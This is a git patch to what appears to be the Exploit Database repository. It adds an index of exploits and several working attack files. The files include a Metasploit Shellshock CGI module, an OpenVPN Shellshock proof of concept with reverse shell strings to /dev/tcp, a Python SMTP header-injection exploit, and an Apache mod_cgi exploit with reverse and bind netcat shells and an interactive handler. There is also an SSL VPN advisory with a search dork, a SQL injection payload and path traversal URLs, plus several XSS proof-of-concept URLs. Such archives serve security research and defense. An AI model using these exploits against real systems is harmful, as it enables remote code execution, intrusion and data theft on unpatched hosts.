From 8025a0f69b5d59ef0699f22c7c62acb8853c4833 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 8 Oct 2014 04:44:30 +0000 Subject: [PATCH] Updated 10_08_2014 --- files.csv | 34 ++++++- platforms/cgi/webapps/34895.rb | 67 ++++++++++++ platforms/cgi/webapps/34918.txt | 137 +++++++++++++++++++++++++ platforms/linux/remote/34879.txt | 106 +++++++++++++++++++ platforms/linux/remote/34896.py | 79 +++++++++++++++ platforms/linux/remote/34900.py | 146 +++++++++++++++++++++++++++ platforms/multiple/webapps/34907.txt | 9 ++ platforms/multiple/webapps/34908.txt | 9 ++ platforms/multiple/webapps/34909.txt | 9 ++ platforms/multiple/webapps/34910.txt | 9 ++ platforms/multiple/webapps/34911.txt | 9 ++ platforms/multiple/webapps/34912.txt | 9 ++ platforms/multiple/webapps/34913.txt | 9 ++ platforms/multiple/webapps/34914.txt | 9 ++ platforms/multiple/webapps/34915.txt | 9 ++ platforms/multiple/webapps/34916.txt | 9 ++ platforms/multiple/webapps/34917.txt | 9 ++ platforms/php/webapps/34888.html | 9 -- platforms/php/webapps/34888.txt | 9 ++ platforms/php/webapps/34890.txt | 49 +++++++++ platforms/php/webapps/34891.txt | 11 ++ platforms/php/webapps/34892.txt | 9 ++ platforms/php/webapps/34893.txt | 13 +++ platforms/php/webapps/34894.txt | 13 +++ platforms/php/webapps/34902.txt | 7 ++ platforms/php/webapps/34903.txt | 8 ++ platforms/php/webapps/34904.txt | 9 ++ platforms/php/webapps/34905.txt | 11 ++ platforms/php/webapps/34906.txt | 11 ++ platforms/php/webapps/34919.txt | 9 ++ platforms/windows/dos/34889.vcf | 11 ++ 31 files changed, 835 insertions(+), 12 deletions(-) create mode 100755 platforms/cgi/webapps/34895.rb create mode 100755 platforms/cgi/webapps/34918.txt create mode 100755 platforms/linux/remote/34879.txt create mode 100755 platforms/linux/remote/34896.py create mode 100755 platforms/linux/remote/34900.py create mode 100755 platforms/multiple/webapps/34907.txt create mode 100755 platforms/multiple/webapps/34908.txt create mode 100755 platforms/multiple/webapps/34909.txt create mode 100755 platforms/multiple/webapps/34910.txt create mode 100755 platforms/multiple/webapps/34911.txt create mode 100755 platforms/multiple/webapps/34912.txt create mode 100755 platforms/multiple/webapps/34913.txt create mode 100755 platforms/multiple/webapps/34914.txt create mode 100755 platforms/multiple/webapps/34915.txt create mode 100755 platforms/multiple/webapps/34916.txt create mode 100755 platforms/multiple/webapps/34917.txt delete mode 100755 platforms/php/webapps/34888.html create mode 100755 platforms/php/webapps/34888.txt create mode 100755 platforms/php/webapps/34890.txt create mode 100755 platforms/php/webapps/34891.txt create mode 100755 platforms/php/webapps/34892.txt create mode 100755 platforms/php/webapps/34893.txt create mode 100755 platforms/php/webapps/34894.txt create mode 100755 platforms/php/webapps/34902.txt create mode 100755 platforms/php/webapps/34903.txt create mode 100755 platforms/php/webapps/34904.txt create mode 100755 platforms/php/webapps/34905.txt create mode 100755 platforms/php/webapps/34906.txt create mode 100755 platforms/php/webapps/34919.txt create mode 100755 platforms/windows/dos/34889.vcf diff --git a/files.csv b/files.csv index 23ec2adf6..b01dee741 100755 --- a/files.csv +++ b/files.csv @@ -31299,8 +31299,8 @@ id,file,description,date,author,platform,type,port 34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 -34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0 -34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 +34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (ShellShock)",2014-09-25,"Stephane Chazelas",linux,remote,0 +34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (ShellShock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 34767,platforms/windows/dos/34767.py,"BS.Player 2.56 '.m3u' and '.pls' File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos,0 34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 'tg-scan.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-27,anT!-Tr0J4n,windows,remote,0 34769,platforms/php/webapps/34769.txt,"MySITE SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-27,MustLive,php,webapps,0 @@ -31406,6 +31406,7 @@ id,file,description,date,author,platform,type,port 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 'search.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 'gamelist.php' Cross Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0 +34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - ShellShock Exploit",2014-10-04,"hobbily plunt",linux,remote,0 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0 34882,platforms/php/webapps/34882.html,"sNews 1.7 'snews.php' Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0 @@ -31413,4 +31414,31 @@ id,file,description,date,author,platform,type,port 34885,platforms/php/webapps/34885.txt,"Auction RSS Content Script rss.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0 34886,platforms/php/webapps/34886.txt,"Auction RSS Content Script search.php id Parameter XSS",2009-08-26,Moudi,php,webapps,0 34887,platforms/php/webapps/34887.txt,"JCE-Tech PHP Video Script 'index.php' Cross Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0 -34888,platforms/php/webapps/34888.html,"sNews 1.7 'snews.php' Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0 +34888,platforms/php/webapps/34888.txt,"UloKI PHP Forum 2.1 'search.php' Cross Site Scripting Vulnerability",2009-08-19,Moudi,php,webapps,0 +34889,platforms/windows/dos/34889.vcf,"Microsoft Windows Mobile Overly Long vCard Name Field Denial of Service Vulnerability",2010-10-21,SecurityArchitect.Org,windows,dos,0 +34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 +34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 'name' Parameter HTML Injection Vulnerability",2010-10-21,"SecPod Research",php,webapps,0 +34892,platforms/php/webapps/34892.txt,"pecio cms 2.0.5 'target' Parameter Cross Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0 +34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 +34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 +34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE (MSF) Shellshock Exploit",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 +34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0 +34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 +34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles /riddles/results.php searchquery Parameter XSS",2009-08-20,Moudi,php,webapps,0 +34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0 +34904,platforms/php/webapps/34904.txt,"Radvision Scopia 'entry/index.jsp' Cross Site Scripting Vulnerability",2009-08-24,"Francesco Bianchino",php,webapps,0 +34905,platforms/php/webapps/34905.txt,"W-Agora <= 4.2.1 search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 +34906,platforms/php/webapps/34906.txt,"W-Agora <= 4.2.1 search.php bn Parameter XSS",2010-10-22,MustLive,php,webapps,0 +34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for e-business ivt/ivtserver parm1 Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/acl method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/domain method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34910,platforms/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/group method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34911,platforms/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/gso method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34912,platforms/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/gsogroup method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34913,platforms/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/os method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34914,platforms/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/pop method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/rule method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/user method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0 +34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 +34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 diff --git a/platforms/cgi/webapps/34895.rb b/platforms/cgi/webapps/34895.rb new file mode 100755 index 000000000..ae50d1f4c --- /dev/null +++ b/platforms/cgi/webapps/34895.rb @@ -0,0 +1,67 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Shellshock Bashed CGI RCE', + 'Description' => %q{ + This module exploits the shellshock vulnerability in apache cgi. It allows you to + excute any metasploit payload you want. + }, + 'Author' => + [ + 'Stephane Chazelas', # vuln discovery + 'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-6271' ] + ], + 'Payload' => + { + 'BadChars' => "", + }, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Targets' => + [ + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , + OptString.new('FILEPATH', [true, 'The url ', '/tmp']) + ], self.class) + end + + def exploit + @payload_name = "#{rand_text_alpha(5)}" + full_path = datastore['FILEPATH'] + '/' + @payload_name + payload_exe = generate_payload_exe + if payload_exe.blank? + fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload") + end + peer = "#{rhost}:#{rport}" + print_status("#{peer} - Creating payload #{full_path}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => datastore['TARGETURI'], + 'agent' => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" + "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\"" + }) + end +end \ No newline at end of file diff --git a/platforms/cgi/webapps/34918.txt b/platforms/cgi/webapps/34918.txt new file mode 100755 index 000000000..4dfea516b --- /dev/null +++ b/platforms/cgi/webapps/34918.txt @@ -0,0 +1,137 @@ +Ultra Electronics / AEP Networks - SSL VPN (Netilla / Series A / Ultra +Protect) Vulnerabilities + http://www.osisecurity.com.au/advisories/ultra-aep-netilla-vulnerabilities + +Release Date: + 02-Oct-2014 + +Software: + Ultra Electronics - Series A + http://en.wikipedia.org/wiki/NetillaOS_NetConnect_by_Northbridge_Secure_Systems_(Secure_Remote_Access_SSL_VPN) + +Versions tested: + Version 7.2.0.19 and 7.4.0.7 have been confirmed as vulnerable. Other +versions untested. + +Google Dork: inurl:/preauth/login.cgi +Page 1 of about 321 results (0.25 seconds) + +URL: + +https://[target]/preauth/login.cgi?realm=local + +There are a few different issues with the 'realm' parameter. + +1) SQL injection. You can use sqlmap for this. + +./sqlmap.py -u "https://[target]/preauth/login.cgi?realm=abc" --level 5 + +sqlmap identified the following injection points with a total of 927 +HTTP(s) requests: +--- +Place: GET +Parameter: realm + Type: boolean-based blind + Title: PostgreSQL stacked conditional-error blind queries + Payload: realm=-2661'); SELECT (CASE WHEN (9569=9569) THEN 9569 +ELSE 1/(SELECT 0) END);-- +--- + +web application technology: Apache +back-end DBMS operating system: Linux Red Hat +back-end DBMS: PostgreSQL +banner: 'PostgreSQL 8.3.4 on x86_64-redhat-linux-gnu, compiled by +GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)' + +Funnily enough, a lot of the source code is commented with things like +"#FIXME add param validation" as a reminder by the developer that the +code doesn't validate input - but somehow made it into production. + +DB.pm line ~189 where realm is used in an SQL select: + +sub set_message { + my $self = shift; + warn(__PACKAGE__, "::set_message() called\n") if $self->{'debug'}; + + my ($key, $value) = @_; # FIXME add param validation + + my $realm_name=$self->{'realm'}; + my $c = $self->{'_dbh'}; + my $locale = $self->{'locale'} ; + my $r = $c->exec(" + select * from set_realm_message('$realm_name', +'$locale', '$key', '$value') + "); + if ($r->resultStatus ne PGRES_TUPLES_OK) { + return; + } + my $retval = $r->fetchrow; + return $retval; + +} + +2) The realm is also used in a perl based mkdir(). This allows you to +create arbitrary folders, allows for path disclosure / checking files +exist etc. + +Manager.pm line ~43: +chown $uid, $gid, mkpath($path, 0); + +File.pm line ~160: +my $parent = File::Basename::dirname($path); + unless (-d $parent or $path eq $parent) { + push(@created,mkpath($parent, $verbose, $mode)); + } + print "mkdir $path\n" if $verbose; + +Examples: + +https://[target]/preauth/login.cgi?realm=../../../etc/hosts + +Error +mkdir /tmp/netilla-cache/C11N_get_messages/../../../etc/hosts: File +exists at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm +line 43 +Back + +https://[target]/preauth/login.cgi?realm=../../../../bin/ + +Error +mkdir /tmp/netilla-cache/C11N_get_messages/../../../../bin: Permission +denied at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm +line 43 +Back + +The portal requires authentication to access "protected" areas but +once you are authenticated, you can HTTP GET internal device +configuration files and other resources that an authenticated user +shouldn't be able to read. + +Credit: + This vulnerability was discovered by Patrick Webster. + +Disclosure timeline: + 28-May-2012 - Discovered during test. + 28-May-2012 - Vendor contact, referred to support and legal departments. + 19-Jun-2012 - Requested vendor update. + 20-Jun-2012 - Told to contact support email. Sent. + 19-Jul-2012 - Support request to close ticket. Told support no +progress has been made. Support requires CVE to progress. + 23-Jul-2012 - Told support no CVE has been assigned. Support refuse +to investigate without a CVE. Told to upgrade to newest release +7.4.0.7. Confirmed as affected. + 14-Aug-2012 - Vendor support closing ticket, no investigation or patch. + 02-Oct-2014 - Public disclosure. Assumed vulnerable. + + Note: Product is now known as NetillaOS by Northbridge Secure +Systems. 2014 status unknown. + +About OSI Security: + + OSI Security is an independent network and computer security auditing + and consulting company based in Sydney, Australia. We provide internal + and external penetration testing, vulnerability auditing and wireless + site audits, vendor product assessments, secure network design, + forensics and risk mitigation services. + +We can be found at http://www.osisecurity.com.au/ \ No newline at end of file diff --git a/platforms/linux/remote/34879.txt b/platforms/linux/remote/34879.txt new file mode 100755 index 000000000..88906dad6 --- /dev/null +++ b/platforms/linux/remote/34879.txt @@ -0,0 +1,106 @@ +# Exploit Title: ShellShock OpenVPN Exploit + +# Date: Fri Oct 3 15:48:08 EDT 2014 + +# Exploit Author: hobbily AKA @fj33r + +# Version: 2.2.29 + +# Tested on: Debian Linux + +# CVE : CVE-2014-6271 + +#Probably should of submitted this the day I tweeted it. +### server.conf +port 1194 +proto udp +dev tun +client-cert-not-required +auth-user-pass-verify /etc/openvpn/user.sh via-env +tmp-dir "/etc/openvpn/tmp" +ca ca.crt +cert testing.crt +key testing.key # This file should be kept secret +dh dh1024.pem +server 10.8.0.0 255.255.255.0 +keepalive 10 120 +comp-lzo +user nobody +group nogroup +persist-key +persist-tun +client-cert-not-required +plugin /usr/lib/openvpn/openvpn-auth-pam.so login +script-security 3 +status openvpn-status.log +verb 3 + +### user.sh +#!/bin/bash +echo "$username" +echo "$password" + +### start server +openvpn server.con + +### terminal 1 +nc -lp 4444 + +### terminal 2 +sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo + +### username && password were both shellshocked just incase +user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 & +pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 & + +### log +Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts +Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY +Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key +Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate +Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ] +Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072] +Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1 +Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened +Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100 +Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0 +Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500 +Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2 +Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ] +Mon Sep 29 20:56:56 2014 GID set to nogroup +Mon Sep 29 20:56:56 2014 UID set to nobody +Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef] +Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef] +Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256 +Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0 +Mon Sep 29 20:56:56 2014 Initialization Sequence Completed +Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ] +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ] +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded' +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919' +Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02 +AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module +Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1 +Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so +_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__ + +Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer +Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA +Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194 +Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST' +Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds +Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1) +Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111) +Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting + +### nc listener +nobody@debian:/etc/openvpn$ id +id +uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) +#shoutouts to Fredrik Str?mberg for the post he made on ycombinator + + + \ No newline at end of file diff --git a/platforms/linux/remote/34896.py b/platforms/linux/remote/34896.py new file mode 100755 index 000000000..4e015ca56 --- /dev/null +++ b/platforms/linux/remote/34896.py @@ -0,0 +1,79 @@ +#!/bin/python +# Exploit Title: Shellshock SMTP Exploit +# Date: 10/3/2014 +# Exploit Author: fattymcwopr +# Vendor Homepage: gnu.org +# Software Link: http://ftp.gnu.org/gnu/bash/ +# Version: 4.2.x < 4.2.48 +# Tested on: Debian 7 (postfix smtp server w/procmail) +# CVE : 2014-6271 + +from socket import * +import sys + +def usage(): + print "shellshock_smtp.py " + +argc = len(sys.argv) +if(argc < 3 or argc > 3): + usage() + sys.exit(0) + +rport = 25 +rhost = sys.argv[1] +cmd = sys.argv[2] + +headers = ([ + "To", + "References", + "Cc", + "Bcc", + "From", + "Subject", + "Date", + "Message-ID", + "Comments", + "Keywords", + "Resent-Date", + "Resent-From", + "Resent-Sender" + ]) + +s = socket(AF_INET, SOCK_STREAM) +s.connect((rhost, rport)) + +# banner grab +s.recv(2048*4) + +def netFormat(d): + d += "\n" + return d.encode('hex').decode('hex') + +data = netFormat("mail from:<>") +s.send(data) +s.recv(2048*4) + +data = netFormat("rcpt to:") +s.send(data) +s.recv(2048*4) + +data = netFormat("data") +s.send(data) +s.recv(2048*4) + +data = '' +for h in headers: + data += netFormat(h + ":() { :; };" + cmd) + +data += netFormat(cmd) + +# . +data += "0d0a2e0d0a".decode('hex') + +s.send(data) +s.recv(2048*4) + +data = netFormat("quit") +s.send(data) +s.recv(2048*4) + diff --git a/platforms/linux/remote/34900.py b/platforms/linux/remote/34900.py new file mode 100755 index 000000000..f250a6d66 --- /dev/null +++ b/platforms/linux/remote/34900.py @@ -0,0 +1,146 @@ +#! /usr/bin/env python +from socket import * +from threading import Thread +import thread, time, httplib, urllib, sys + +stop = False +proxyhost = "" +proxyport = 0 + +def usage(): + print """ + + Shellshock apache mod_cgi remote exploit + +Usage: +./exploit.py var= + +Vars: +rhost: victim host +rport: victim port for TCP shell binding +lhost: attacker host for TCP shell reversing +lport: attacker port for TCP shell reversing +pages: specific cgi vulnerable pages (separated by comma) +proxy: host:port proxy + +Payloads: +"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport) +"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport) + +Example: + +./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 +./exploit.py payload=bind rhost=1.2.3.4 rport=1234 + +Credits: + +Federico Galatolo 2014 +""" + sys.exit(0) + +def exploit(lhost,lport,rhost,rport,payload,pages): + headers = {"Cookie": payload, "Referer": payload} + + for page in pages: + if stop: + return + print "[-] Trying exploit on : "+page + if proxyhost != "": + c = httplib.HTTPConnection(proxyhost,proxyport) + c.request("GET","http://"+rhost+page,headers=headers) + res = c.getresponse() + else: + c = httplib.HTTPConnection(rhost) + c.request("GET",page,headers=headers) + res = c.getresponse() + if res.status == 404: + print "[*] 404 on : "+page + time.sleep(1) + + +args = {} + +for arg in sys.argv[1:]: + ar = arg.split("=") + args[ar[0]] = ar[1] +try: + args['payload'] +except: + usage() + +if args['payload'] == 'reverse': + try: + lhost = args['lhost'] + lport = int(args['lport']) + rhost = args['rhost'] + payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" + except: + usage() +elif args['payload'] == 'bind': + try: + rhost = args['rhost'] + rport = args['rport'] + payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'" + except: + usage() +else: + print "[*] Unsupported payload" + usage() + +try: + pages = args['pages'].split(",") +except: + pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] + +try: + proxyhost,proxyport = args['proxy'].split(":") +except: + pass + +if args['payload'] == 'reverse': + serversocket = socket(AF_INET, SOCK_STREAM) + buff = 1024 + addr = (lhost, lport) + serversocket.bind(addr) + serversocket.listen(10) + print "[!] Started reverse shell handler" + thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,)) +if args['payload'] == 'bind': + serversocket = socket(AF_INET, SOCK_STREAM) + addr = (rhost,int(rport)) + thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,)) + +buff = 1024 + +while True: + if args['payload'] == 'reverse': + clientsocket, clientaddr = serversocket.accept() + print "[!] Successfully exploited" + print "[!] Incoming connection from "+clientaddr[0] + stop = True + clientsocket.settimeout(3) + while True: + reply = raw_input(clientaddr[0]+"> ") + clientsocket.sendall(reply+"\n") + try: + data = clientsocket.recv(buff) + print data + except: + pass + + if args['payload'] == 'bind': + try: + serversocket = socket(AF_INET, SOCK_STREAM) + time.sleep(1) + serversocket.connect(addr) + print "[!] Successfully exploited" + print "[!] Connected to "+rhost + stop = True + serversocket.settimeout(3) + while True: + reply = raw_input(rhost+"> ") + serversocket.sendall(reply+"\n") + data = serversocket.recv(buff) + print data + except: + pass diff --git a/platforms/multiple/webapps/34907.txt b/platforms/multiple/webapps/34907.txt new file mode 100755 index 000000000..657b619a6 --- /dev/null +++ b/platforms/multiple/webapps/34907.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable. + +http://www.example.com/ivt/ivtserver?parm1=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34908.txt b/platforms/multiple/webapps/34908.txt new file mode 100755 index 000000000..c383752f2 --- /dev/null +++ b/platforms/multiple/webapps/34908.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable. + +http://www.example.com/ibm/wpm/acl?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34909.txt b/platforms/multiple/webapps/34909.txt new file mode 100755 index 000000000..92b9d71d8 --- /dev/null +++ b/platforms/multiple/webapps/34909.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly 